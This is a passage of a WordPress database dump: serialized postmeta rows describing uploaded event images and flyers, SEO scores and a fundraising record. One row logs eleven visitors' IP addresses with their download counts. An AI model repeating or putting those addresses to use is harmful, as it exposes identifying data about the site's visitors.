;s:28:\"2017/01/Angela-Jefferson.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"Angela-Jefferson-768x1082.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1082;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"Angela-Jefferson-727x1024.jpg\";s:5:\"width\";i:727;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:28:\"Angela-Jefferson-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:5:\"VS987\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.42\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3984,1004,'_wp_attached_file','2017/02/Black-Expo.jpg'),(3985,1004,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1350;s:4:\"file\";s:22:\"2017/02/Black-Expo.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Black-Expo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Black-Expo-240x300.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Black-Expo-768x960.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:960;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Black-Expo-819x1024.jpg\";s:5:\"width\";i:819;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Black-Expo-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Black-Expo-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Black-Expo-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Black-Expo-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3996,493,'_yoast_wpseo_primary_event_categories',''),(3997,493,'_yoast_wpseo_content_score','60'),(4011,1010,'_wp_attached_file','2017/02/IMG_1343.gif'),(4012,1010,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:380;s:6:\"height\";i:285;s:4:\"file\";s:20:\"2017/02/IMG_1343.gif\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1343-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1343-300x225.gif\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/gif\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_1343-180x110.gif\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4017,1014,'_wp_attached_file','2017/03/IMG_1374.png'),(4018,1014,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:816;s:6:\"height\";i:1056;s:4:\"file\";s:20:\"2017/03/IMG_1374.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1374-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"IMG_1374-232x300.png\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"IMG_1374-768x994.png\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"IMG_1374-791x1024.png\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"IMG_1374-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"IMG_1374-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"IMG_1374-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"IMG_1374-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4049,1023,'_edit_lock','1492554387:1'),(4050,1023,'_edit_last','1'),(4051,1023,'ts_article_views','671'),(4052,1023,'ts_template','a:0:{}'),(4053,1023,'cause','a:7:{s:10:\"date-start\";s:0:\"\";s:8:\"date-end\";i:1494115200;s:9:\"paypal-id\";s:19:\"paypal@zphiblgz.org\";s:13:\"currency-code\";s:1:\"$\";s:15:\"funded-till-now\";s:3:\"300\";s:5:\"total\";s:3:\"700\";s:6:\"custom\";s:0:\"\";}'),(4054,1023,'_yoast_wpseo_content_score','30'),(4055,1023,'_yoast_wpseo_primary_cause_categories','68'),(4056,1025,'_wp_attached_file','2017/01/LGZWineryFlyer-e1492549796950.png'),(4057,1025,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:100;s:6:\"height\";i:140;s:4:\"file\";s:41:\"2017/01/LGZWineryFlyer-e1492549796950.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-214x300.png\";s:5:\"width\";i:214;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:26:\"LGZWineryFlyer-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4058,1026,'_wp_attached_file','2017/02/MOD-1.png'),(4059,1026,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:17:\"2017/02/MOD-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"MOD-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"MOD-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"MOD-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"MOD-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"MOD-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"MOD-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"MOD-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4060,1027,'_wp_attached_file','2017/02/werewalking-purple.jpg'),(4061,1027,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:30:\"2017/02/werewalking-purple.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"werewalking-purple-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:30:\"werewalking-purple-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4066,1035,'_wp_attached_file','2017/04/SpiritNight-1.pdf'),(4067,1035,'_wp_attachment_metadata','a:1:{s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"SpiritNight-1-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"SpiritNight-1-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"SpiritNight-1-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"full\";a:4:{s:4:\"file\";s:21:\"SpiritNight-1-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";}}}'),(4068,1036,'_wp_attached_file','2017/04/SpiritNight.jpg'),(4069,1036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2550;s:6:\"height\";i:3300;s:4:\"file\";s:23:\"2017/04/SpiritNight.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"SpiritNight-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"SpiritNight-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"SpiritNight-768x994.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:994;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"SpiritNight-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"SpiritNight-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"SpiritNight-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"SpiritNight-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"SpiritNight-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4096,1025,'_wp_attachment_backup_sizes','a:4:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:480;s:6:\"height\";i:672;s:4:\"file\";s:18:\"LGZWineryFlyer.png\";}s:18:\"full-1492549776215\";a:3:{s:5:\"width\";i:240;s:6:\"height\";i:336;s:4:\"file\";s:33:\"LGZWineryFlyer-e1492549761981.png\";}s:18:\"full-1492549783403\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:280;s:4:\"file\";s:33:\"LGZWineryFlyer-e1492549776215.png\";}s:18:\"full-1492549796950\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:280;s:4:\"file\";s:33:\"LGZWineryFlyer-e1492549783403.png\";}}'),(4097,1041,'_wp_attached_file','2017/04/SwirlSip.png'),(4098,1041,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2017/04/SwirlSip.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"SwirlSip-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"SwirlSip-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"SwirlSip-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"SwirlSip-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"SwirlSip-500x300.png\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"SwirlSip-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4099,1043,'_wp_attached_file','2017/04/Swirl.png'),(4100,1043,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:17:\"2017/04/Swirl.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Swirl-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:17:\"Swirl-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:17:\"Swirl-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:17:\"Swirl-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4102,1045,'_wp_attached_file','2017/04/SpiritNightTN.png'),(4103,1045,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:25:\"2017/04/SpiritNightTN.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"SpiritNightTN-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:25:\"SpiritNightTN-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:25:\"SpiritNightTN-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"SpiritNightTN-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4110,1023,'_yoast_wpseo_focuskw_text_input','March of Dimes'),(4111,1023,'_yoast_wpseo_focuskw','March of Dimes'),(4112,1023,'_yoast_wpseo_linkdex','18'),(4116,989,'__wpdmx_user_download_count','a:11:{s:13:\"82.80.249.219\";i:1;s:12:\"50.86.54.141\";i:1;s:12:\"70.194.5.234\";i:1;s:13:\"23.31.193.133\";i:3;s:15:\"107.218.129.130\";i:2;s:13:\"82.80.249.192\";i:1;s:13:\"107.77.234.48\";i:2;s:13:\"172.58.168.10\";i:1;s:14:\"96.244.216.219\";i:1;s:12:\"68.58.200.70\";i:1;s:12:\"99.203.31.81\";i:2;}'),(4117,1057,'_wp_attached_file','2014/12/synchronicity.png'),(4118,1057,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2014/12/synchronicity.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"synchronicity-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:25:\"synchronicity-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4119,1058,'_wp_attached_file','2014/12/CRCARES_WEB_742x275.jpg'),(4120,1058,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:742;s:6:\"height\";i:275;s:4:\"file\";s:31:\"2014/12/CRCARES_WEB_742x275.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-300x111.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-400x275.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-680x275.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:31:\"CRCARES_WEB_742x275-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4121,1058,'_edit_lock','1495283612:1'),(4122,1058,'ts_template','a:0:{}'),(4123,1058,'_edit_last','1'),(4124,1058,'_yoast_wpseo_content_score','30'),(4125,1059,'_wp_attached_file','2017/01/BB.png'),(4126,1059,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:14:\"2017/01/BB.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"BB-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:14:\"BB-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4127,1060,'_wp_attached_file','2017/01/Fenise.png'),(4128,1060,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:18:\"2017/01/Fenise.png\";s:5:\"sizes\";a: